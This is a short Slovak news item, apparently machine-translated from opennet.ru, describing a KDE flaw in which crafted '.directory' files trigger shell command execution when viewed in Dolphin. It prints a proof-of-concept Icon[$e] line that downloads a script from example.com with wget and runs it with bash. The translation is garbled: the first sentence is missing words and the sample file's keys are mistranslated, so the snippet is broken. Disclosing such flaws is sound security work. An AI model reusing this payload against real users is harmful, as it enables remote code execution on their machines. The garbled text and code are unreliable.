V KDE , ktorý umožňuje útočníkovi vykonávať ľubovoľné príkazy, keď si používateľ prezerá adresár alebo archív obsahujúci špeciálne navrhnuté súbory „.desktop“ a „.directory“. Útok vyžaduje, aby si používateľ jednoducho prezrel zoznam súborov v správcovi súborov Dolphin, stiahol škodlivý súbor na ploche alebo pretiahol odkaz na plochu alebo do dokumentu. Problém sa prejavuje v aktuálnom vydaní knižníc a staršie verzie, až po KDE 4. Zraniteľnosť pretrváva (CVE nepridelené).
Problém je spôsobený nesprávnou implementáciou triedy KDesktopFile, ktorá pri spracovaní premennej „Icon“ bez správneho escapovania odovzdá hodnotu funkcii KConfigPrivate::expandString(), ktorá vykoná expanziu špeciálnych znakov shellu vrátane spracovania reťazce „$(..)“ ako príkazy, ktoré sa majú vykonať. Na rozdiel od požiadaviek špecifikácie XDG implementácia škrupinové konštrukcie sa vyrábajú bez oddelenia typu nastavení, t.j. nielen pri určovaní príkazového riadka aplikácie, ktorá sa má spustiť, ale aj pri určovaní štandardne zobrazených ikon.
Napríklad zaútočiť poslať používateľovi archív zip s adresárom obsahujúcim súbor „.directory“, ako napríklad:
[Prístup pre počítač]
Typ=Adresár
Ikona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Keď sa pokúsite zobraziť obsah archívu v správcovi súborov Dolphin, skript https://example.com/FILENAME.sh sa stiahne a spustí.
Zdroj: opennet.ru